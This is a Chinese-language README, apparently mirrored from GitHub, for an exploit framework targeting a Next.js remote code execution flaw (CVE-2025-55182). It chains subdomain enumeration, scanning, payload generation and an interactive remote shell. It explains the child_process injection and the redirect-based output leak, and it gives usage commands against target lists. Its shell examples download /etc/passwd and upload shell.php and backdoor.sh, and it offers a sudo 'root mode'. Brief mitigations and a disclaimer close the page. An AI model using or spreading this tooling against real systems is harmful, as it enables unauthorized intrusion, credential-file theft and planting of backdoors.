opsecramdan/react2shell-cve-2025-55182

GitHub: opsecramdan/react2shell-cve-2025-55182

React2Shell 是一个针对 Next.js 的 CVE-2025-55182 远程代码执行漏洞的利用框架,提供子域名枚举、漏洞扫描与交互式 shell 的一体化攻击链。

Stars: 0 | Forks: 0

# 🚨 React2Shell - CVE-2025-55182 漏洞利用框架 ![Severity](https://img.shields.io/badge/Severity-Critical-red) ![Type](https://img.shields.io/badge/Vulnerability-RCE-blue) ![Platform](https://img.shields.io/badge/Target-Next.js-black) ![Python](https://img.shields.io/badge/Python-3.x-yellow) **作者:** opsecramdan ## 📚 目录 - 概述 - 漏洞详情 - 功能 - 环境要求 - 安装说明 - 使用方法 - 交互式 Shell - 输出文件 - 影响 - 缓解措施 - 限制 - 免责声明 ## 📌 概述 React2Shell 是一个漏洞利用框架,旨在识别和利用基于 Next.js 的应用程序中的 **CVE-2025-55182** 漏洞。 该工具被设计为一个 **多合一攻击工具包**,涵盖: - 子域名枚举 - 漏洞扫描 - 漏洞利用引擎 - 交互式远程 Shell ## 🔍 漏洞详情 - **CVE ID**: CVE-2025-55182 - **类型**: 远程代码执行 (RCE) - **平台**: Next.js - **攻击向量**: 恶意的 multipart/form-data 请求 - **影响**: 任意命令执行 ### 🧠 根本原因 此漏洞通过以下方式利用 Next.js 的内部机制: 1. 将 payload 注入请求 2. 调用: `process.mainModule.require('child_process')` 3. 执行 OS 命令 4. 将输出进行 Base64 编码 5. 通过重定向 (`/login?a=`) 泄露结果 ## ⚙️ 功能 ### 🔎 子域名枚举 - DNS + HTTP 扫描 - 内置字典 - 支持自定义字典 - 自动保存结果 ### 🧪 漏洞扫描器 - 多 endpoint 测试: - `/` - `/api` - `/api/auth` - `/_next` - `/admin` - `/dashboard` - Header 与响应分析 - 减少误报 ### 💣 漏洞利用引擎 - 自动生成 payload - Base64 编码执行 - 基于重定向的输出提取 ### 🖥️ 交互式 Shell - 远程命令执行 - 持久化会话 - 目录跟踪 ### 📂 文件操作 - 上传文件 - 下载文件 - 创建文件 ### 👑 Root 模式 - `sudo -i` 执行 - 权限提升模拟 ## 📦 环境要求 - Python 3.x 安装依赖项: pip install requests dnspython ## 📥 安装说明 ### 1. 克隆仓库 git clone https://github.com/yourusername/react2shell-cve-2025-55182.git ### 2. 进入目录 cd react2shell-cve-2025-55182 ### 3. 运行工具 python3 react2shell.py ## 🚀 使用方法 ### 🎯 单个目标 python3 react2shell.py -u https://target.com 不带 protocol: python3 react2shell.py -u target.com ### 📄 多个目标 python3 react2shell.py -f targets.txt targets.txt 内容示例: https://target1.com http://target2.com:3000 target3.com ### 🌐 全量模式 (侦察 + 扫描 + 利用) python3 react2shell.py -d example.com 流程: 1. 子域名枚举 2. 漏洞扫描 3. 漏洞利用 (可选) ### 📚 自定义字典 python3 react2shell.py -d example.com -w wordlist.txt ### 🐞 调试模式 python3 react2shell.py -d example.com --debug ## 🖥️ 交互式 Shell 漏洞利用成功后,你将获得 shell 访问权限。 ### 基本命令 whoami id uname -a pwd ls -lah ### ⚙️ 特殊命令 | 命令 | 描述 | |----------------|------------| | .root | 切换 root 模式 | | .upload | 上传文件到目标 | | .download | 从目标下载文件 | | .create | 在目标上创建文件 | | .save | 将输出保存到本地文件 | | .exit | 退出 shell | ### 📂 上传文件 .upload shell.php /tmp/shell.php ### 📥 下载文件 .download /etc/passwd ### 📄 创建文件 .create /tmp/test.txt ## 🔄 工作流示例 ### 1. 扫描域名 python3 react2shell.py -d example.com ### 2. 识别存在漏洞的目标 ### 3. 进入 shell whoami ### 4. 上传 payload .upload backdoor.sh /tmp/backdoor.sh ## 📁 输出文件 该工具将生成: - subdomains_*.txt - vulnerable_*.txt - output_*.txt ## ⚠️ 影响 如果成功被利用: - 远程命令执行 - 访问敏感文件 - 上传 backdoor - 持久化访问 - 权限提升 ## 🛡️ 缓解措施 - 将 Next.js 更新到最新版本 - 限制内部 endpoint - 严格校验输入 - 使用 WAF (OWASP CRS) - 监控异常活动 ## ⚠️ 免责声明 此工具仅用于: - 学习 - 研究 - 授权的渗透测试 严禁用于非法活动。 ## ⭐ 备注 此项目展示了: - 高级的漏洞利用技术 - 对 Next.js 内部机制的深入理解 - 真实世界攻击模拟
标签:Next.js, Python, 主机安全, 代码生成, 无后门, 渗透测试工具, 漏洞利用框架, 编程工具, 网络安全审计, 远程代码执行